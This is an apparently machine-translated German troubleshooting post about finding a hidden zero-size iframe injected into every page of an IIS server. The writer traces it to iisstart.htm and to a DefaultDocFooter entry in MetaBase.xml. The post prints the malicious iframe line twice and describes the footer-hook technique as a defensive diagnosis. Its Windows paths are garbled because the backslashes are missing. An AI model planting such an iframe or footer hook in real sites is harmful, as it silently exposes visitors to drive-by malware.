Wenn ein Server fast alle Websites öffnet, erscheinen sogar HTML-Seiten.
<iframe src=" http://xxxdfsfd/web.htm " height=0 width=0></iframe>
Ein Teil dieses Codestils befindet sich im Kopfteil, ein Teil im Endteil. Antivirensoftware meldet Viren, wenn sie geöffnet wird.
Ich kann diesen Code nicht im Quellcode finden, wenn ich die HTML- oder ASP-PHP-Seite öffne.
Analysieren Sie die Gründe
Zuerst vermutete ich ARP-Malware. Ich habe Anti-ARP-Tools verwendet und kein Arp-Spoofing festgestellt.
Darüber hinaus wird Arp-Spoofing im Allgemeinen nicht jedes Mal in den Code eingefügt, sondern manchmal und manchmal
Und Sie können diesen Code auch finden, wenn Sie über http://127.0.0.1 oder http://localhost zugreifen
Die Möglichkeit von Arp-Spoofing ist ausgeschlossen.
Dann dachte ich, dass der JS oder andere enthaltene Dateien manipuliert worden sein könnten. Nach der Suche wurden keine geänderten Seiten gefunden. Selbst beim Durchsuchen der neu erstellten HTML-Seite wird dieser Code eingefügt, sodass er nur über IIS aufgehängt werden kann . .
Nach dem Sichern der IIS-Daten und der anschließenden Neuinstallation von IIS verschwand der Code. Nach dem Wiederherstellen der gesicherten IIS trat das Problem erneut auf.
Nach sorgfältiger Suche sollte das Problem in der IIS-Konfigurationsdatei liegen. Als ich die Konfigurationsdatei öffnete, konnte ich diesen Code nicht finden.
Es ist sehr wahrscheinlich, dass eine bestimmte Datei aufgerufen wird. Wie kann ich das überprüfen? Mir fiel plötzlich das berühmte Filemon ein.
Ich habe eines lokal heruntergeladen und auf den Server hochgeladen. Es waren zu viele Daten vorhanden, die ich herausgefiltert habe.
Es ist nur noch der iis-Prozess übrig und es sind noch viele Daten vorhanden. Es scheint, dass viele Leute die Site auf dem Server besuchen.
Schließen Sie alle Sites und erstellen Sie eine Test-Site anky. Das Verzeichnis ist D:www und erstellen Sie unten eine leere Seite test.htm.
Besuchen Sie diese Seite, der Code wurde eingefügt, und schauen Sie sich Filemon an. Es ist seltsam, wie man C:Inetpubwwwrootiisstart.htm liest
Öffnen Sie C:Inetpubwwwrootiisstart.htm und prüfen Sie, ob dies der Fall ist
<iframe src=" http://xxxdfsfd/web.htm " height=0 width=0></iframe>
Löschen Sie den Code und lassen Sie ihn leer. Beim Zugriff auf test.htm ist es normal, C:Inetpubwwwrootiisstart.htm zu löschen und erneut darauf zuzugreifen.
Hier tritt das Problem „Fehler beim Lesen der Datenfußzeile“ in test.htm auf
diese Datei.
Es ist normal, wenn Sie C:Inetpubwwwrootiisstart.htm löschen. Um das Problem zu lösen, müssen Sie es natürlich entfernen.
weitermachen
Kann es sein, dass es an einer Erweiterung liegt? Ich habe es in der Erweiterung überprüft und alles ist normal.
Natürlich gibt es auch Trojaner über ISAPI.
Nach langem Überlegen hatte ich schließlich das Gefühl, dass mit der Konfigurationsdatei etwas nicht stimmte.
Öffnen Sie die Konfigurationsdatei, die sich unter %windir%system32inetsrvMetaBase.xml befindet
Öffnen Sie es mit Notepad, suchen Sie nach iisstart.htm und finden Sie eine Zeile. Zuerst dachte ich, es sei die Standardseite, aber dann dachte ich, es sei falsch.
Die Standardseiten wurden gelöscht. Schauen Sie sich diesen Code genauer an:
DefaultDocFooter="DATEI:C:Inetpubwwwrootiisstart.htm"
Löschen Sie diese Zeile und das Problem ist vollständig gelöst.